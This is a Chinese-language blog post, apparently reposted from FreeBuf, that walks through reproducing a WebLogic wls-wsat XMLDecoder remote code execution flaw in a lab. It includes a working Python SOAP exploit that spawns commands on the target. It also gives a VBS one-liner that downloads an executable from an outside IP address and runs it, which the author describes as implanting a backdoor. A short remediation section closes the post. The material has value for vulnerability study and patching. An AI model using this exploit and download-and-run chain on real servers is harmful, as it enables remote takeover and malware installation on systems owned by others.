复现WebLogic最新漏洞（WLS组件）

内容简介：复现WebLogic最新漏洞（WLS组件）

WebLogic又爆大漏洞了，之前有一个 java 反序列化的漏洞，通杀所有WebLogic，现在wls组件又出问题了，漏洞根源像是xxe，这次我来复现整个漏洞。我在虚拟机上安装WebLogic，做为靶机，我的xp系统作为攻击机。

1.准备环境

1.1  WebLogic 安装包

下载地址： http://download.oracle.com/otn/nt/middleware/11g/wls/1036/oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-win32.exe

1.2 WebLogic wls 漏洞POC

2.安装WebLogic

在虚拟机中运行oepe-wls-indigo-installer-11.1.1.8.0.201110211138-10.3.6-win32.exe，如图1

图1

点击【下一步】，图2

图2

保持默认，点击【下一步】按钮。如图3

图3

把”我希望通过My Oracle Support 接收安全更新”的勾去掉。一路【下一步】到安装界面，如图4

图4

等待一刻钟后，安装完成。如图5

图5

点击”Getting Started with WebLogic Server@ 10.3.6”，出现配置界面，选择“创建域”，如图6

图6

一路【下一步】，到这里勾上“启动管理服务器“，点击完成，如图7

图7

启动WebLogic除了上面的图形界面，还可以直接运行startWebLogic.cmd，路径为

C:\Oracle\Middleware\user_projects\domains\base_domain\

现在WebLogic环境已经搭建好了，测试下wls组件是否正常，如图8

图8

3.执行POC

我们的POC代码为

#! -*- coding:utf-8 -*-
import requests
 
url = "http://192.168.1.103:7001/wls-wsat/CoordinatorPortType"
xml = '''
    <soapenv:Envelope     xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
       <work:WorkContext    xmlns:work="http://bea.com/2004/06/soap/workarea/">
           <java      version="1.8" class="java.beans.XMLDecoder">
                <void     class="java.lang.ProcessBuilder">
                    <array    class="java.lang.String" length="3">
                        <void     index="0">
                            <string>cmd</string>
                        </void>
                        <void     index="1">
                            <string>/c</string>
                        </void>
                        <void     index="2">
                            <string>calc</string>
                        </void>
                    </array>
                <void     method="start"/></void>
           </java>
       </work:WorkContext>
   </soapenv:Header>
    <soapenv:Body/>
    </soapenv:Envelope>
'''
r =requests.post(url,headers={'Content-Type':'text/xml','Cache-Control':'no-cache'},data=xml)
print r.status_code
  print r.text

在cmd中执行后，如图9是我的xp系统，图10 是虚拟机上的结果，可以看到弹出了计算器程序。

图9

图10

现在我们在目标机上写一个文本文件，修改POC中的calc为echo isafe>c:\aa.txt,我们成功的写入一个文件，如图11

图11

现在我们执行的命令都成功了，只是没有回显功能，我们再实现一个下载器，也就是说下载一个EXE文件并运行。

4. Windows 上的文件下载脚本

在Windows上要执行下载文件功能，可以使用脚本，因为没有wget这个程序，一般我们可以使用vbs脚本或者powershell脚本。

我们主要测试vbs脚本，先看下面一段vbs代码

echo Set xPost = CreateObject("Microsoft.XMLHTTP") > hu.vbs&@echo xPost.Open "GET","http://122.23.134.27:30080/auto.exe",0 >> hu.vbs&@echo xPost.Send() >> hu.vbs&@echo Set sGet = CreateObject("ADODB.Stream") >> hu.vbs&@echo sGet.Mode = 3 >> hu.vbs&@echo sGet.Type = 1 >> hu.vbs&@echo sGet.Open() >>hu.vbs&@echo sGet.Write(xPost.responseBody) >>hu.vbs&@echo sGet.SaveToFile "auto.exe",2 >>hu.vbs&@cscript hu.vbs&@del hu.vbs&@start auto.exe

这段代码经过测试可以被WebLogic调用。这样就实现了一次攻击，可以植入一个后门。

5.漏洞修复

删除以下文件并重启WebLogic服务

rm-f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war

rm-f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war

rm-rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

*本文作者：河马安全网，转载请注明来自FreeBuf.COM

以上就是本文的全部内容，希望对大家的学习有所帮助，也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

• 通过关键字获取漏洞平台最新漏洞信息
• Coremail主动公开最新漏洞
• seacms v6.64 最新漏洞分析
• 漏洞预警 | MetInfo最新版本爆出SQL注入漏洞
• 利用Confluence最新漏洞传播的Linux挖矿病毒seasame
• 警惕！利用Confluence最新漏洞传播的Linux挖矿病毒seasame

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。